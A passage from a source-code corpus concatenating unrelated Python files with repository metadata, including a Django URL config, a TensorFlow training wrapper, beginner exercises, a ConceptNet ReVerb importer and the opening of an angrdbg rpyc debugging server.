        patch_set = MultiprocessorExtractor(image_set, patches, r).generate_planes()
        elapsed = timeit.default_timer() - start_time
        # print "Elapsed time to extract 96 depth planes X 4 cameras: %.2f seconds" % elapsed
        elapsed = timeit.default_timer() - start_time_read
        # print "Elapsed time with image read: %.2f seconds" % elapsed
        # print len(patch_set)
        #plt.imshow(result)
        #plt.show()
    def test_multipatch_generation(self):
        # extract multi-scale patches from one frame and print their geometry
        set_gen = SetGenerator(os.path.join(self.dataset_path, 'sequences'))
        patches = set_gen.generate_patch("00")
        for key in patches:
            print("Patch key: %s" % key)
            patch = patches[key]
            print("TL:%s BR:%s" % (patch[0], patch[1]))
            center = (patch[0][0] + key / 2, patch[0][1] + key / 2)
            print("Center: (%s,%s)" % center)
        # print(patches)
        image = mpimg.imread('/Volumes/Bahia/kitti-dataset/sequences/00/image_2/000000.png')
        extracted = extract_multipatch(image, patches)
        print("Done")
| [
"sorous.hrezaei7@gmail.com"
] | sorous.hrezaei7@gmail.com |
2aa69b4a3ff0de990419e6744aa990e0df63fe3d | 8095e922b65c5bd196f7a2a491d0e0c015ffbc9f | /src/accounts/urls.py | aaadbe67bcdd87ddce2de1034d674cff7ac4835f | [] | no_license | raheemazeezabiodun/django-react-redux-blog | 8f016c4846c849752b113bc0c0fee073853c3bc9 | 21bcfcff819f52b7349f1d052befb335784fad78 | refs/heads/master | 2020-03-07T05:22:03.813640 | 2018-04-07T18:13:53 | 2018-04-07T18:13:53 | 127,293,885 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | from django.conf.urls import url
from django.utils.translation import ugettext_lazy as _
import accounts.views
urlpatterns = [
url(_(r'^login/$'),
accounts.views.UserLoginView.as_view(),
name='login'),
]
| [
"raheemazeez4@gmail.com"
] | raheemazeez4@gmail.com |
483bf82cc9e82d120ce08aa7b02284817733f6c4 | c0dca52ecced3a1d5db3a97a196b3ca3aa45033e | /utils/model_solver.py | 1143bf125d1a2608799032e12fcd9861645edb12 | [
"MIT"
] | permissive | wesley1001/tsc | 607226b32af5d20926c4403d4c3392d9d2bd0689 | fd0eb3dc50685b91d5926053e32ce4c8211738b3 | refs/heads/master | 2021-05-17T07:33:26.237783 | 2020-03-21T13:36:32 | 2020-03-21T13:36:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,798 | py | ##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
## Created by: Haihao Zhu
## ShanghaiTech University
## zhuhh2@shanghaitech.edu.cn
## Copyright (c) 2019
##
## This source code is licensed under the MIT-style license found in the
## LICENSE file in the root directory of this source tree
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
import tensorflow as tf
import time
import numpy as np
import pandas as pd
class Solver(object):
    '''Thin wrapper around a Keras model handling training and evaluation.'''
    def __init__(self, opt, model, dataset_name, num_classes):
        '''Store the configuration object, the model and dataset metadata.'''
        self.opt = opt
        self.model = model
        self.dataset_name = dataset_name
        self.num_classes = num_classes
    def fit(self, train_data, test_data, optimizer, criterion, callbacks, metric):
        '''Compile and train the model, then report timing and best accuracy.

        train_data/test_data -- tf.data datasets (or equivalents accepted
        by Keras fit); criterion is the loss, metric the tracked metric.
        '''
        # train
        start_time = time.time()
        """ low level handling, not working for now, use build-in training process instead.
        for ep in range(self.opt.train.num_epochs):
            print("epoch {0} training start".format(ep))
            for step, (x, y) in enumerate(train_data):
                #print(y.shape)
                with tf.GradientTape() as tape:
                    logits = self.model(x)
                    loss = criterion(y, logits)
                grads = tape.gradient(loss, self.model.trainable_weights)
                optimizer.apply_gradients(zip(grads, self.model.trainable_weights))
                #print(y, logits)
                train_metric(y, logits)
                if step % 5 == 0:
                    print('loss of step {0} is {1}'.format(step, loss.numpy()))
                    print('acc of step {0} is {1}'.format(step, train_metric.result().numpy()))
            print('training acc of epoch {0} is {1}'.format(ep, train_metric.result().numpy()))
        """
        # built-in training process
        #x_train, y_train = train_data
        self.model.compile(optimizer=optimizer, loss=criterion, metrics=[metric])
        #self.model.fit(x_train, y_train, batch_size=self.opt.train.batch_size, validation_split=0.2, epochs=self.opt.train.num_epochs)
        history = self.model.fit(train_data, validation_data=test_data, epochs=self.opt.train.num_epochs, callbacks=callbacks)
        end_time = time.time()
        duration = end_time - start_time
        print('duration of training dataset {0} is {1}'.format(self.dataset_name, duration))
        print('min validate accuracy: {0}'.format(np.max(history.history['val_categorical_accuracy'])))
        res = pd.DataFrame(history.history)
        # NOTE(review): to_csv() without a path returns the CSV as a string,
        # which is discarded here -- nothing is written to disk; confirm intent.
        res.to_csv()
    def save(self):
        # not implemented yet
        pass
    def predict(self):
        # not implemented yet
        pass
    def evaluate(self, test_data):
        '''Evaluate the (best) trained model on the test dataset.'''
        # use best model in training process
        results = self.model.evaluate(test_data)
        print('test loss, test acc:', results)
"2712079998@qq.com"
] | 2712079998@qq.com |
6555482bf26bf64908bb088cc87f0d66e92b40ee | 9bf8877b6f6b4061982cd8afc1c8643e72d29e53 | /LearnPythonHardWay/ex25Practice.py | 602ee134d8eae7fd48ff81e261d3b32fb0911576 | [] | no_license | Jonaz80/PythonProjects | e6960b2a3f776581d62a328517b70ee8ee678a06 | 30be350703437d9dc60ac9a49bc0f018ccef55b5 | refs/heads/master | 2020-04-11T23:26:53.330378 | 2019-08-14T20:28:54 | 2019-08-14T20:28:54 | 162,167,199 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 769 | py | def break_words(stuff):
words = stuff.split(' ')
return words
def sort_words(words):
    """Return a new list containing *words* in ascending order."""
    ordered = list(words)
    ordered.sort()
    return ordered
def print_first_word(words):
    """Pop the first word off *words* (mutating it) and print it."""
    print(words.pop(0))
def print_last_word(words):
    """Pop the last word off *words* (mutating it) and print it."""
    print(words.pop(-1))
def sort_sentence(sentence):
    """Split *sentence* on spaces and return its words in sorted order."""
    # split-and-sort inlined (previously delegated to break_words/sort_words)
    return sorted(sentence.split(' '))
def print_first_and_last(sentence):
    """Print the first and then the last word of *sentence*."""
    # split-pop-print inlined (previously delegated to the helpers above)
    words = sentence.split(' ')
    print(words.pop(0))
    print(words.pop(-1))
def print_first_and_last_sorted(sentence):
    """Sort the words of *sentence*, then print the first and last of them."""
    # split, sort and pop inlined (previously delegated to the helpers above)
    words = sorted(sentence.split(' '))
    print(words.pop(0))
    print(words.pop(-1))
| [
"noreply@github.com"
] | noreply@github.com |
f4fdc569715d0ecd60411afc6fbe30af9fcaa8c2 | 513c2b96e2bfceb911cf4b4fc42cc8a34653dbc8 | /layers/core.py | 0cf99ade60664d6839b92851a76f6c10c4114fa3 | [] | no_license | iiharu/NN | 171ff9852720a76311a728cbf08beb48162d4327 | dc982bdbd6c8ef122068da15a98877c827ab06c6 | refs/heads/master | 2020-04-16T23:39:02.337343 | 2019-06-28T05:00:25 | 2019-06-28T05:00:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,089 | py | # -*- coding: utf-8 -*-
import tensorflow as tf
from tensorflow import keras
def dense(units, activation=None, use_bias=True,
          kernel_initializer='glorot_uniform', bias_initializer='zeros',
          kernel_regularizer=None, bias_regularizer=None,
          activity_regularizer=None,
          kernel_constraint=None, bias_constraint=None,
          **kwargs):
    """Factory returning a keras.layers.Dense layer.

    Thin wrapper that forwards every argument unchanged; defaults mirror
    the Keras defaults.
    """
    return keras.layers.Dense(units, activation=activation, use_bias=use_bias,
                              kernel_initializer=kernel_initializer, bias_initializer=bias_initializer,
                              kernel_regularizer=kernel_regularizer, bias_regularizer=bias_regularizer,
                              activity_regularizer=activity_regularizer,
                              kernel_constraint=kernel_constraint, bias_constraint=bias_constraint,
                              **kwargs)
def dropout(rate, noise_shape=None, **kwargs):
    """Factory returning a keras.layers.Dropout layer with the given rate."""
    return keras.layers.Dropout(rate, noise_shape=noise_shape, **kwargs)
def flatten(**kwargs):
    """Factory returning a keras.layers.Flatten layer."""
    return keras.layers.Flatten(**kwargs)
| [
"iiharu@alumni.tus.ac.jp"
] | iiharu@alumni.tus.ac.jp |
90ffb9bbf344668c0902be78a49dfc17a1a3605d | 85a758eb440e748add42fd90ae6097d7b200e140 | /nsl/go/__about__.py | 26d1b01ca1275bb0cc742e59c18a95df598057ea | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | newskylabs/nslgo | af9b435fb897866049dd646137d9c9598ed5abcc | c5570b31fbd3febd4e9f75bdeba5b12d62d185d8 | refs/heads/master | 2020-05-02T16:25:32.354595 | 2019-05-02T21:47:52 | 2019-05-02T21:47:52 | 178,067,840 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,864 | py | ## =========================================================
## Copyright 2019 Dietrich Bollmann
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
## ---------------------------------------------------------
## =========================================================
## Package metadata
## ---------------------------------------------------------
# Names exported by `from ... import *`; one dunder per metadata field.
__all__ = [
    '__package_name__',
    '__version__',
    '__status__',
    '__description__',
    '__author__',
    '__authors__',
    '__maintainer__',
    '__email__',
    '__contact__',
    '__copyright__',
    '__url__',
    '__license__',
    '__date__',
]

# Package identity and release information (consumed by setup tooling).
__package_name__ = 'nslgo'
__version__ = '0.0.1.dev1'
__status__ = 'Development'
__description__ = 'NewSkyLabs Python project {}'.format(__package_name__)
__author__ = 'Dietrich Bollmann'
__authors__ = [__author__]
__maintainer__ = __author__
__email__ = 'dietrich@newskylabs.net'
__contact__ = __email__
__copyright__ = 'Copyright 2019 {}'.format(__author__)
__url__ = 'http://newskylabs.net/python/packages/{}'.format(__package_name__)
__license__ = 'Apache License 2.0, http://www.apache.org/licenses/LICENSE-2.0'
__date__ = '2019/04/12'
## =========================================================
## =========================================================
## fin.
| [
"dietrich@newskylabs.net"
] | dietrich@newskylabs.net |
65467841df68300d6c0d6331f26a0ff5ead3bc36 | aa5ed4ac7ca3a466c9a813a7b1571bd1640819f1 | /unittest/test_data_generator_m.py | c3a2e2341cd6640696a0bbb2e973f517d8c6fe75 | [] | no_license | jason157/data_analysis | 8335b0de7aae1bcda379559f18d84968a18f1078 | 1d2cb53266b39d9cd2868ece3e96844fac02c937 | refs/heads/master | 2022-12-20T14:44:01.140737 | 2020-09-25T13:33:26 | 2020-09-25T13:33:26 | 297,929,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 390 | py | import unittest
from src.data_generator_m import main
class MultiDataGenTestCase(unittest.TestCase):
    '''Smoke test driving data_generator_m.main with a fixed argv tuple.

    NOTE(review): no assertions -- only checks that main() runs without
    raising; the output file path is relative to the unittest directory.
    '''
    def test_data_generator_m(self):
        dataset_type = "source"
        quantity = 50
        save_file_name = "../data/test.txt"
        # mimic sys.argv: (script name, dataset type, count, output path)
        argv = ("test_data_generator_m.py", dataset_type, quantity, save_file_name)
        main(argv)
# Allow running this test module directly with the unittest runner.
if __name__ == '__main__':
    unittest.main()
| [
"jason157@126.com"
] | jason157@126.com |
009e557a57f43a23f7987f49b59cdcb9458f5f72 | a14b57c49b77456b2bb568a3539cd6df0b0b3338 | /01 Download_HeadImages.py | f891691c95dc145ad3a9183f0c6affa173fd01c6 | [] | no_license | WillemChan/GreetingCards-to-WeChat-Friends | c5549ccf8d2d732ea3619ecf229529af2945ad8a | e735e022d9e7b4f5d76b4ee14c7758abcb706fb3 | refs/heads/master | 2020-04-15T01:55:32.591346 | 2019-01-17T10:21:19 | 2019-01-17T10:21:19 | 164,296,530 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,032 | py | import itchat
import os
def dld_hImages(outdir):
    """Download the avatars of all WeChat friends into *outdir*.

    Logs in to the web version of WeChat via a QR code, then saves every
    friend's head image as '<RemarkName>.jpg' inside *outdir* (created if
    missing). Friends whose avatar cannot be fetched are skipped with a
    message instead of crashing the whole run.
    """
    # Get the QR code to log in to the web version of WeChat
    itchat.auto_login()
    friends = itchat.get_friends(update=True)[0:]
    print(len(friends))  # Get the number of friends (entry 0 is the owner)
    # create the output directory if needed (the old os.mkdir crashed when
    # the directory already existed) and work inside it
    os.makedirs(outdir, exist_ok=True)
    os.chdir(outdir)
    # friends[0] is the logged-in account itself, so start at index 1
    for friend in friends[1:]:
        try:
            img = friend['img'] = itchat.get_head_img(userName=friend["UserName"])
        except ConnectionError:
            # network hiccup: report and skip (the old code fell through and
            # crashed on the missing image data)
            print('get ' + friend["RemarkName"][0:] + ' fail')
            continue
        friend['ImgName'] = friend["RemarkName"][0:] + ".jpg"
        # context manager guarantees the file is closed even on write errors
        with open(friend['ImgName'], 'wb') as fileImage:
            fileImage.write(img)
if __name__ == "__main__":
dld_hImages('C:/Users/Willem/Jupyter_Exercise/sending_pictures/headImages_bef')
print('头像下载完毕')
| [
"Williamsstorm@outlook.com"
] | Williamsstorm@outlook.com |
8d7c6c7fe158a77d2d2ea97fae0cd38889c2106b | 424213d62d7e88a907bfc30b52cef61f6d4b95b7 | /007 - 10001st prime/007.py | 782b2a4aea5e439253af3db6bb0ab02c2f98d2cb | [] | no_license | David-Jackson/project-euler-solutions | ae1b3e88987c4e428be046cb6d9562995e0e0298 | 5ba9d9914f6d170110c4f9b533357c167b9f986d | refs/heads/master | 2021-01-19T10:43:04.444228 | 2017-03-15T18:29:51 | 2017-03-15T18:29:51 | 82,206,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 359 | py |
def is_prime(n):
    """Return True when n is prime, using trial division up to sqrt(n)."""
    if n <= 1:
        return False
    if n <= 3:
        return True  # 2 and 3 are prime
    # n is prime iff no divisor exists in [2, floor(sqrt(n))]
    return all(n % d != 0 for d in range(2, int(n ** 0.5) + 1))
# Count odd candidates until the 10001st prime is found.
# i counts primes found so far (2 is pre-counted), i_prime holds the latest.
i = 1
i_prime = 2
n = 3
while (i < 10001):
	if (is_prime(n)):
		i += 1
		i_prime = n
	n += 2
# NOTE: Python 2 print statement -- this file targets Python 2.
print "Answer:", i_prime
| [
"jack8679@kettering.edu"
] | jack8679@kettering.edu |
0e1842795d299b5058a649381cc355508b4f59e8 | ead56091e5a1459d5ffb508742fe4c43b7ceae9c | /DiscreteSys/cobweb.py | 99181ddab823af3bc3f917ee3043191de4b1dc02 | [] | no_license | CPSC-SMC/MathModeling | 40dd5ae59b7f58e07bc73b8a7dbec28ce4949da0 | c7b6ac01a68e82d634ff2152d4f7c279e9d12296 | refs/heads/master | 2016-09-10T04:29:32.289030 | 2014-12-08T17:52:49 | 2014-12-08T17:52:49 | 18,861,418 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,242 | py | # -*- coding: utf-8 -*-
"""
Cobweb plot
@author: sbroad
"""
import numpy as np
import matplotlib.pyplot as plt
def cobweb(x0, f, ginv = lambda x: x, n = 20):
    """
    Draw a cobweb plot of f against g (default g(x)=x).

    x0   ---> starting value of the iteration
    f    ---> the function with a fixed/equilibrium point
    ginv ---> the inverse of the function against which to find equilibrium
              (identity map by default)
    n    ---> the number of cobweb iterations to use (default 20)

    Returns [xmin, xmax, ymin, ymax] of the plotted cobweb.
    """
    xs = [x0]
    ys = [f(x0)]
    for _ in range(n):
        prev = xs[-1]
        nxt = ginv(f(prev))
        # each iteration adds one horizontal and one vertical cobweb segment
        xs.extend([nxt, nxt])
        ys.extend([f(prev), f(nxt)])
    plt.plot(xs, ys, 'k--', label = 'cobweb')
    return [min(xs), max(xs), min(ys), max(ys)]
def supply(p):
    """Quantity supplied at price p (linear supply curve)."""
    return 10 + 2 * p
def demand_price(x):
    """Price at which quantity x clears the market (hyperbolic demand)."""
    return 100.0 / x
# Demo: cobweb the demand-price map against the supply curve starting at
# quantity 12, then overlay the supply and demand curves themselves.
plt.close()
lims = cobweb(12, demand_price, ginv = supply)
# axis grids padded one unit beyond the cobweb extent
x = np.linspace(lims[0] - 1, lims[1] + 1, 21)
y = np.linspace(lims[2] - 1, lims[3] + 1, 21)
plt.plot(supply(y), y, label = 'supply')
plt.plot(x, demand_price(x), label = 'demand')
plt.title('Cobweb plot of supply vs. demand')
plt.xlabel('Quantity produced / purchased')
plt.ylabel('Price')
plt.legend(loc='best')
| [
"sbroad@saintmarys.edu"
] | sbroad@saintmarys.edu |
28e1ce89031c317ca92663f63da50fac4b3c0ef4 | 5f1ecf84de54db5ae8eb6cb35d56a40210a5431c | /cnet5_index_builder/cnet5-data/reverb/read_reverb.py | 955739c555bad83c3d9902c492a696e16690ef0c | [] | no_license | Web5design/conceptnet5 | 5afbdfc47316b0472305b6f3084e9abc062aff97 | e93cb933b59f1b190007b62f9c1ac1966c2fa35f | refs/heads/master | 2021-01-18T06:03:02.460091 | 2013-08-07T17:55:47 | 2013-08-07T17:55:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,470 | py | import codecs, string
import json
import sys
import os
from metanl.english import normalize
from conceptnet5.nodes import make_concept_uri
from conceptnet5.edges import make_edge, MultiWriter
#from file_chunk_processor import FileChunkProcessor
# Unfortunately, the current file contains a mix of normalized and unnormalized
# output, based on the way things worked in the beta of ConceptNet 5. In fact,
# we have to combine both of them to get all the relevant information.
#
# We should develop a better process for this, but right now we will assume
# that a normalized and unnormalized statement are related if they have the
# same floating-point number as their score and appear adjacent in the file.
REVERB_FILES = ['raw_data/reverb_featured_triples.txt']
def output_edge(obj,writer):
    """Convert one paired ReVerb statement into a ConceptNet 5 edge.

    ``obj`` carries 'arg1'/'rel'/'arg2', a numeric 'weight', optionally a
    'surfaceRel' (raw relation text) and 'sources' whose first entry is the
    Wikipedia article title this statement came from.
    """
    objsource = obj['sources'][0]
    # Snap an argument to the article title when it merely extends it
    # (prefix or suffix of the argument equals the source title).
    if obj['arg1'].startswith(objsource):
        obj['arg1'] = objsource
    if obj['arg2'].startswith(objsource):
        obj['arg2'] = objsource
    if obj['arg1'].endswith(objsource):
        obj['arg1'] = objsource
    if obj['arg2'].endswith(objsource):
        obj['arg2'] = objsource
    start = make_concept_uri(obj['arg1'], 'en')
    end = make_concept_uri(obj['arg2'], 'en')
    # A capitalized relation is a named ConceptNet relation (/r/...);
    # anything else becomes a concept URI built from the relation text.
    # (Python 2: string.uppercase.)
    if obj['rel'][0] in string.uppercase:
        rel = '/r/'+obj['rel']
    else:
        rel = make_concept_uri(obj['rel'], 'en')
    # Skip deictic arguments ("this ...", "these ...") — not useful concepts.
    if start.startswith('/c/en/this_') or start.startswith('/c/en/these_') or end.startswith('/c/en/this_') or end.startswith('/c/en/these_'):
        return
    context = make_concept_uri(objsource, 'en')
    source = "/s/web/en.wikipedia.org/wiki/%s" % (objsource.replace(' ', '_'))
    rules = ['/s/rule/reverb', '/s/rule/reverb_filter_apr2012']
    # Surface text shows the raw relation when available, falling back to
    # the (possibly normalized) 'rel'.
    surfaceText = u"[[%s]] %s [[%s]]" % (obj['arg1'], obj.get('surfaceRel', obj['rel']), obj['arg2'])
    # Cube-and-halve the ReVerb confidence to de-emphasize low scores.
    weight = float(obj['weight']) ** 3 / 2
    edge = make_edge(rel, start, end,
                     dataset='/d/reverb/wp_frontpage',
                     license='/l/CC/By-SA',
                     sources=[source] + rules,
                     context=context,
                     surfaceText=surfaceText,
                     weight=weight)
    writer.write(edge)
def handle_lines(lines,writer):
    """Pair adjacent raw/normalized ReVerb JSON lines and emit edges.

    The input file mixes unnormalized and normalized statements; two
    adjacent lines sharing the same floating-point 'weight' (and whose
    normalized arguments agree) are treated as one assertion — the first
    line's relation becomes the surface text, the second's the edge
    relation.
    """
    current_obj = None    # pending (first-of-pair) statement
    current_score = None  # its weight, used to detect the paired line
    for line in lines:
        line = line.strip()
        # Skip blank lines and bracketed metadata lines.
        if line and not line.startswith('['):
            obj = json.loads(line)
            if current_obj is None:
                current_obj = obj
                current_score = obj['weight']
                obj['surfaceRel'] = obj['rel']
            elif obj['weight'] == current_score:
                # Same score as the pending line: adopt the normalized
                # relation only when both arguments normalize identically.
                if normalize(obj['arg1']) == normalize(current_obj['arg1']) and normalize(obj['arg2']) == normalize(current_obj['arg2']):
                    current_obj['rel'] = obj['rel']
                output_edge(current_obj,writer)
                current_obj = None
                current_score = None
            else:
                # Different score: the pending line had no pair; flush it.
                if current_obj is not None:
                    output_edge(current_obj,writer)
                current_obj = obj
                current_score = obj['weight']
                obj['surfaceRel'] = obj['rel']
    # Flush a trailing unpaired statement.
    if current_obj is not None:
        output_edge(current_obj,writer)
    # NOTE(review): this closes the shared writer after one file, yet
    # __main__ loops over REVERB_FILES — a second file would hit a closed
    # writer. Harmless today (the list has one entry); confirm before
    # adding files.
    writer.close()
if __name__ == '__main__':
    # One writer shared by all input files (see NOTE in handle_lines).
    writer = MultiWriter('reverb-wp-frontpage')
    for file_to_read in REVERB_FILES:
        # Replace undecodable bytes rather than aborting on bad input.
        lines = codecs.open(file_to_read, encoding='utf-8', errors='replace')
        handle_lines(lines,writer)
| [
"digitial-intuition@digitialintuition-Inspiron-620.(none)"
] | digitial-intuition@digitialintuition-Inspiron-620.(none) |
9ae8d7ce445ae3cc95832b024c28c453579539ec | 2b7c7e9b00ed9b2dbbac943ee4b79865a96d10de | /Figure_script/Figure_Sobol_env_heatmap.py | c9d4513a3b6f3d83f0f93bf2429b86ad119e7dbf | [] | no_license | YaojieLu/Plant_traits_inversion | ad973e60bb32717d9d718f774c2ec77433c38ced | ec83642ae2a2e6ef96502e58f8074bffdadfefe8 | refs/heads/master | 2021-06-21T15:22:00.225498 | 2020-12-13T22:12:21 | 2020-12-13T22:12:21 | 140,017,309 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,163 | py |
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# import data
# Load the Sobol sensitivity results and keep only the T == 30 slice.
df = pd.read_csv('../Results/Sobol_env.txt', sep = ',', index_col = 0)
df = df[df['T'] == 30]
df['D'] = round(df['D'], 4)  # round D so pivot columns align
# Parameter column names and their LaTeX axis labels.
paras = ['c', 'L', 'p50', 'ps']
latex = ['$\\mathit{c}$', '$\\mathit{L}$',
         '$\\psi_{x50}$', '$\\psi_{s}$']
labels = dict(zip(paras, latex))
# One heatmap per parameter, laid out on a 2x2 grid of subplots.
sns.set(font_scale = 1.3)
fig = plt.figure(figsize = (16, 16))
for i in range(len(paras)):
    # NOTE(review): len(paras)/2 is a float on Python 3; newer matplotlib
    # rejects float subplot specs — confirm targeted Python/mpl version.
    ax = fig.add_subplot(2, len(paras)/2, i+1)
    # Rows: irradiance I; columns: vapor deficit D; values: Sobol index.
    df_para = df.pivot(index = 'I', columns = 'D', values = paras[i])
    sns.heatmap(df_para, cmap = 'viridis', xticklabels = 3, yticklabels = 3)
    #plt.xlim
    #plt.ylim([0, 1])
    # Only the bottom row gets an x label; only the left column a y label.
    if i > 1:
        plt.xlabel('$\\mathit{D}$', fontsize = 20)
    else:
        ax.axes.get_xaxis().set_visible(False)
    if i == 0 or i == 2:
        plt.ylabel('$\\mathit{I}$', fontsize = 20)
    else:
        ax.axes.get_yaxis().set_visible(False)
    plt.title(labels[paras[i]], fontsize = 20)
# NOTE(review): plt.tight_layout is referenced but not called (missing
# parentheses) — it currently has no effect.
plt.tight_layout
plt.subplots_adjust(wspace = 0, hspace = 0.15)
plt.savefig('../Figures/Figure Sobol_env_heatmap.png', bbox_inches = 'tight')
| [
"="
] | = |
55a9e15caa3390bc0770bedd2dfc2dc21ce45dea | 43204546c687d7ec6bba04dc925eb07fc3f938e7 | /angrdbg/server.py | 478c2e72b3c3c6f84679b0c78a5ca6077afea852 | [
"BSD-2-Clause"
] | permissive | jhscheer/angrdbg | 5ac4a278b02e4009442e1033a1cbd9bb5d024806 | 50f257fcfea1dde8e4e76625fe64e3ac4e5eca51 | refs/heads/master | 2020-03-29T05:38:19.115641 | 2018-09-17T10:15:26 | 2018-09-17T10:15:26 | 149,591,381 | 0 | 0 | BSD-2-Clause | 2018-09-20T10:20:11 | 2018-09-20T10:20:11 | null | UTF-8 | Python | false | false | 7,990 | py | #!/usr/bin/env python
"""
classic rpyc server running a SlaveService + angrdbg + IPython shell
usage:
angrdbg-srv.py # default settings
angrdbg-srv.py --host HOST --port PORT # custom settings
# ssl-authenticated server (keyfile and certfile are required)
angrdbg-srv.py --ssl-keyfile keyfile.pem --ssl-certfile certfile.pem --ssl-cafile cafile.pem
"""
import sys
import os
import rpyc
import threading
import signal
import Queue
from plumbum import cli
from rpyc.utils.server import Server
from rpyc.utils.classic import DEFAULT_SERVER_PORT, DEFAULT_SERVER_SSL_PORT
from rpyc.utils.registry import REGISTRY_PORT
from rpyc.utils.registry import UDPRegistryClient, TCPRegistryClient
from rpyc.utils.authenticators import SSLAuthenticator
from rpyc.lib import setup_logger
from rpyc.core import SlaveService
BANNER = "[angrdbg server v1.0]"
#######################
import angr
import claripy
import pyvex
import angrdbg
import IPython
#from angrdbg import *
#######################
class WeirdServer(Server):  # n1 threaded n2 forked
    """rpyc Server that accepts exactly two connections: the first is
    served in a thread, the second in a forked child process. When both
    have been accepted, ``done_event`` is set and the listener closes.
    (Python 2 code — note the ``print ee`` statement in join().)
    """

    def __init__(self, service, done_event, **kwargs):
        # Connections still to accept before shutting the listener.
        self.num_conns = 2
        self.thread = None      # thread serving the first client
        self.proc = None        # pid of the fork serving the second client
        self.done_event = done_event
        Server.__init__(self, service, **kwargs)

    @classmethod
    def _handle_sigchld(cls, signum, unused):
        # Reap any terminated children without blocking.
        try:
            while True:
                pid, dummy = os.waitpid(-1, os.WNOHANG)
                if pid <= 0:
                    break
        except OSError:
            pass
        # re-register signal handler (see man signal(2), under Portability)
        signal.signal(signal.SIGCHLD, cls._handle_sigchld)

    def _accept_method(self, sock):
        self.num_conns -= 1
        if self.num_conns == 1:
            # First client: serve in a thread of this process.
            t = threading.Thread(
                target=self._authenticate_and_serve_client,
                args=[sock])
            t.start()
            self.thread = t
        else:
            # Second client: serve in a forked child process.
            pid = os.fork()
            if pid == 0:
                # child
                try:
                    self.logger.debug("child process created")
                    # 76: call signal.siginterrupt(False) in forked child
                    signal.siginterrupt(signal.SIGCHLD, False)
                    self.listener.close()
                    self.clients.clear()
                    self._authenticate_and_serve_client(sock)
                except BaseException:
                    self.logger.exception(
                        "child process terminated abnormally")
                else:
                    self.logger.debug("child process terminated")
                finally:
                    self.logger.debug("child terminated")
                    os._exit(0)
            else:
                # parent: remember the child's pid, drop our copy of the socket
                self.proc = pid
                sock.close()
        # Both clients accepted: signal the main thread and stop listening.
        if self.num_conns == 0:
            self.done_event.set()
            self.listener.close()
            self.join()

    def join(self):
        # Wait for the threaded client to finish, then reap the fork.
        self.thread.join()
        try:
            pid, dummy = os.waitpid(self.proc, 0)  # os.WNOHANG)
        except OSError as ee:
            print ee
class AngrDbgServer(cli.Application):
    """plumbum CLI application: starts a WeirdServer exposing rpyc's
    SlaveService, waits for the two expected client connections, then
    drops the operator into an IPython shell.
    """

    # ---- socket options -------------------------------------------------
    port = cli.SwitchAttr(["-p", "--port"], cli.Range(0, 65535), default=None,
                          help="The TCP listener port (default = %s, default for SSL = %s)" %
                          (DEFAULT_SERVER_PORT, DEFAULT_SERVER_SSL_PORT), group="Socket Options")
    host = cli.SwitchAttr(
        ["--host"],
        str,
        default="127.0.0.1",
        help="The host to bind to. "
        "The default is INADDR_ANY",
        group="Socket Options")
    ipv6 = cli.Flag(["--ipv6"], help="Enable IPv6", group="Socket Options")

    # ---- logging --------------------------------------------------------
    logfile = cli.SwitchAttr(
        "--logfile",
        str,
        default=None,
        help="Specify the log file to use; "
        "the default is stderr",
        group="Logging")
    quiet = cli.Flag(["-q",
                      "--quiet"],
                     help="Quiet mode (only errors will be logged)",
                     group="Logging")

    # ---- SSL (keyfile + certfile enable it; cafile adds client auth) ----
    ssl_keyfile = cli.SwitchAttr(
        "--ssl-keyfile",
        cli.ExistingFile,
        help="The keyfile to use for SSL. Required for SSL",
        group="SSL",
        requires=["--ssl-certfile"])
    ssl_certfile = cli.SwitchAttr(
        "--ssl-certfile",
        cli.ExistingFile,
        help="The certificate file to use for SSL. Required for SSL",
        group="SSL",
        requires=["--ssl-keyfile"])
    ssl_cafile = cli.SwitchAttr(
        "--ssl-cafile",
        cli.ExistingFile,
        help="The certificate authority chain file to use for SSL. Optional; enables client-side "
        "authentication",
        group="SSL",
        requires=["--ssl-keyfile"])

    # ---- registry -------------------------------------------------------
    auto_register = cli.Flag(
        "--register",
        help="Asks the server to attempt registering with "
        "a registry server. By default, the server will not attempt to register",
        group="Registry")
    registry_type = cli.SwitchAttr(
        "--registry-type",
        cli.Set(
            "UDP",
            "TCP"),
        default="UDP",
        help="Specify a UDP or TCP registry",
        group="Registry")
    registry_port = cli.SwitchAttr(
        "--registry-port",
        cli.Range(
            0,
            65535),
        default=REGISTRY_PORT,
        help="The registry's UDP/TCP port",
        group="Registry")
    registry_host = cli.SwitchAttr(
        "--registry-host",
        str,
        default=None,
        help="The registry host machine. For UDP, the default is 255.255.255.255; "
        "for TCP, a value is required",
        group="Registry")

    def main(self):
        # Build the registrar implementation selected by the switches.
        if self.registry_type == "UDP":
            if self.registry_host is None:
                self.registry_host = "255.255.255.255"
            self.registrar = UDPRegistryClient(
                ip=self.registry_host, port=self.registry_port)
        else:
            if self.registry_host is None:
                raise ValueError(
                    "With TCP registry, you must specify --registry-host")
            self.registrar = TCPRegistryClient(
                ip=self.registry_host, port=self.registry_port)
        # SSL is enabled whenever a keyfile was supplied.
        if self.ssl_keyfile:
            self.authenticator = SSLAuthenticator(
                self.ssl_keyfile, self.ssl_certfile, self.ssl_cafile)
